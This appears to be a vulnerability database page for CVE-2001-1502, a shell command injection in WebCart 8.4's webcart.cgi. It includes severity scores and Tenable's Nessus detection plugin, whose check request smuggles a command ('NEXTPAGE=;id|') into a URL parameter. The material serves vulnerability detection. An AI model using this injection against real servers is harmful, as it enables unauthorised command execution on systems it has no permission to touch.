Vulnerabilities > CVE-2001-1502 - Unspecified vulnerability in Mountain Network Systems Webcart 8.4

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
mountain-network-systems
nessus
exploit available
NVD
Published: 2001-12-31
Updated: 2017-07-11

Summary

webcart.cgi in Mountain Network Systems WebCart 8.4 allows remote attackers to execute arbitrary commands via shell metacharacters in the NEXTPAGE parameter.

Vulnerable Configurations

Part Description Count
Application
Mountain_Network_Systems
1

Exploit-Db

descriptionMountain Network Systems WebCart 8.4 Command Execution Vulnerability. CVE-2001-1502. Remote exploit for cgi platform
idEDB-ID:21125
last seen2016-02-02
modified2001-10-19
published2001-10-19
reporter[email protected]
sourcehttps://www.exploit-db.com/download/21125/
titleMountain Network Systems WebCart 8.4 Command Execution Vulnerability

Nessus

NASL familyCGI abuses
NASL idWEBCART_CMD_EXEC.NASL
descriptionwebcart.cgi is installed and does not properly filter user input. An attacker may use this flaw to execute any command on your system.
last seen2020-06-01
modified2020-06-02
plugin id11095
published2002-08-21
reporterThis script is Copyright (C) 2002-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/11095
titleMountain Network Systems webcart.cgi Arbitrary Command Execution
code
#
# (C) Tenable Network Security, Inc.
#

# *untested*
#
# Script audit and contributions from Carmichael Security
#      Erik Anderson <[email protected]> (nb: domain no longer exists)
#      Added BugtraqID
#
# References:
# Date:  Fri, 19 Oct 2001 03:29:24 +0000
# From: [email protected]
# To: [email protected]
# Subject: Webcart v.8.4

include( 'compat.inc' );

if(description)
{
  script_id(11095);
  script_version ("1.28");

  script_cve_id("CVE-2001-1502");
  script_bugtraq_id(3453);

  script_name(english:"Mountain Network Systems webcart.cgi Arbitrary Command Execution");
  script_summary(english:"Detects webcart.cgi");

  script_set_attribute(
    attribute:'synopsis',
    value:"The remote CGI script is vulnerable to command execution."
  );

  script_set_attribute(
    attribute:'description',
    value:"webcart.cgi is installed and does not properly filter user input.
An attacker may use this flaw to execute any command on your system."
  );

  script_set_attribute(
    attribute:'solution',
    value:"Upgrade your software or firewall your web server."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");

  script_set_attribute(
    attribute:'see_also',
    value:"https://seclists.org/bugtraq/2001/Oct/159"
  );

 script_set_attribute(attribute:"plugin_publication_date", value: "2002/08/21");
 script_set_attribute(attribute:"vuln_publication_date", value: "2001/10/18");
 script_cvs_date("Date: 2018/11/15 20:50:19");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_category(ACT_ATTACK);

  script_copyright(english:"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.");
  script_family(english:"CGI abuses");

  script_dependencie("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  exit(0);
}

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

if ( thorough_tests )
{
 extra_list = make_list ("/webcart", "/cgi-bin/webcart");
}
else
  extra_list = NULL;

http_check_remote_code (
			extra_dirs: extra_list,
			check_request:"/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;id|&CODE=PHOLD",
			check_result:"uid=[0-9]+.* gid=[0-9]+.*",
			command:"id"
			);

References